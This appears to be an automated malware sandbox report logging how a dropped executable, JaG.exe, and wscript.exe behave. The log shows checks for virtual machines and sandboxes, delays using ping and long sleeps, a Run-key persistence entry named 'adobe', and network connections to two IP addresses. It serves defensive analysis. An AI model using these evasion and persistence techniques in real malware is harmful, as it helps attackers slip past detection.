                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Yara detected AntiVM3
                            Source: Yara matchFile source: Process Memory Space: JaG.exe PID: 8168, type: MEMORYSTR
                            Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
                            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
                            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
                            Tries to delay execution (extensive OutputDebugStringW loop)
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeSection loaded: OutputDebugStringW count: 271
                            Uses ping.exe to sleep
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 65
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 72
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 65
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 72
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMemory allocated: 24F0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMemory allocated: 26A0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMemory allocated: 46A0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMemory allocated: 56E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMemory allocated: 4F50000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMemory allocated: 66E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMemory allocated: 76E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMemory allocated: 7930000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMemory allocated: 56E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMemory allocated: 66E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMemory allocated: 7930000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMemory allocated: 8930000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMemory allocated: 56E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMemory allocated: 66E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMemory allocated: 56E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMemory allocated: 66E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMemory allocated: 8930000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMemory allocated: 9930000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMemory allocated: A930000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMemory allocated: 76E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMemory allocated: 76E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMemory allocated: 76E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMemory allocated: 76E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMemory allocated: 86E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMemory allocated: 96E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeWindow / User API: threadDelayed 8427Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeWindow / User API: threadDelayed 1355Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -60000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -59890s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -59778s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -59672s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -59562s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -59453s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -59344s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -59219s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -59109s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -59000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -58890s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -58779s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -58671s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -58562s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -58453s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -58344s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -58219s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -58109s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -58000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -57890s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -57781s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -57672s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -57562s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -57451s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -57344s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -57234s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -57125s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -57016s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -56890s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -56781s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -56672s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -56562s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -56452s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -56343s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -56234s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -56125s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -56015s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -55906s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -55797s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -55687s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -55577s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -55469s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -55344s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -55234s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -55125s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -55015s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -54906s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -54797s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -54685s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916Thread sleep time: -54578s >= -30000sJump to behavior
                            Source: C:\Windows\SysWOW64\PING.EXE TID: 3292Thread sleep count: 63 > 30
                            Source: C:\Windows\SysWOW64\PING.EXE TID: 3292Thread sleep time: -63000s >= -30000s
                            Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                            Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                            Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 60000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 59890Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 59778Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 59672Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 59562Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 59453Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 59344Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 59219Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 59109Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 59000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 58890Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 58779Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 58671Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 58562Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 58453Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 58344Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 58219Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 58109Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 58000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 57890Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 57781Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 57672Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 57562Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 57451Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 57344Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 57234Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 57125Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 57016Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 56890Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 56781Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 56672Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 56562Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 56452Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 56343Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 56234Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 56125Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 56015Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 55906Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 55797Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 55687Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 55577Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 55469Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 55344Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 55234Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 55125Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 55015Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 54906Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 54797Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 54685Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 54578Jump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: wscript.exe, 00000003.00000002.2596806001.000001E9CD3A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1682858553.000001E9CD3A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW!~
                            Source: wscript.exe, 00000004.00000002.1376649836.000001A8A2802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: JaG.exe, 00000005.00000002.2290405716.00000000038D1000.00000004.00000800.00020000.00000000.sdmp, JaG.exe, 00000005.00000002.2291109531.0000000004C30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: VBoxTray
                            Source: JaG.exe, 00000005.00000002.2291109531.0000000004C30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: sandboxierpcssGSOFTWARE\VMware, Inc.\VMware VGAuth
                            Source: wscript.exe, 00000001.00000003.1344575852.000002BF1373C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                            Source: wscript.exe, 00000001.00000002.1345634293.000002BF11564000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1343866311.000002BF11564000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1343333967.000002BF11564000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861C6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@s
                            Source: wscript.exe, 00000001.00000002.1346003747.000002BF13702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2596806001.000001E9CD34B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2596806001.000001E9CD3A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1682858553.000001E9CD3A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1682858553.000001E9CD346000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2596539768.000001F861CDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: wscript.exe, 00000004.00000002.1376649836.000001A8A2802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                            Source: wscript.exe, 00000001.00000003.1343333967.000002BF1153F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1345634293.000002BF11544000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1343866311.000002BF11544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW~I
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Benign windows process drops PE files
                            Source: C:\Windows\System32\wscript.exeFile created: JaG.exe.4.drJump to dropped file
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Windows\System32\wscript.exeNetwork Connect: 172.245.208.13 80Jump to behavior
                            Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.168.7.12 6892
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rwinmgmts:\\localhost\root\securitycenter2pac/hmemstr_9d36048c-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe".memstr_5669bfc1-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe".2memstr_cb3ea9b6-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe".$memstr_f7101567-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\system tools\desktop.inimemstr_46f389bb-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: common start menumemstr_57a88e6f-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :\adobe.jsmemstr_c7555182-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdata\roamingmemstr_61789d7a-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\systemmemstr_fa6f65bd-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local documentsmemstr_6f0f480f-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\infxmemstr_322f817d-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32rmemstr_89464030-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdatamemstr_9bf9d6aa-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdata@memstr_0335eeb4-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: roamingmemstr_b705bc3a-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: roaming@memstr_f273f912-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1gzctmemstr_75a2d5f8-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: programsmemstr_5b661359-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: programsjmemstr_43ba20b7-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: programs@shell32.dll,-21782memstr_8be1cdcd-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .appdatamemstr_6916cce1-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .roamingmemstr_3c40116a-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoftmemstr_9c2680a1-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoftdmemstr_cf447fd9-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .microsoftmemstr_5b813959-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: windowsmemstr_85e875a8-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: windows@memstr_0b0823a7-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .windowsmemstr_ce8160c9-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: librariesmemstr_9eb0a25e-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: librariesdmemstr_c4058106-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .librariesmemstr_6f23731d-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21796memstr_01ea2abf-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconresource%systemroot%\system32\imageres.dll,-115memstr_cb393ffb-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconindex-173memstr_48793b24-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (<pdxmemstr_1f0cf620-1
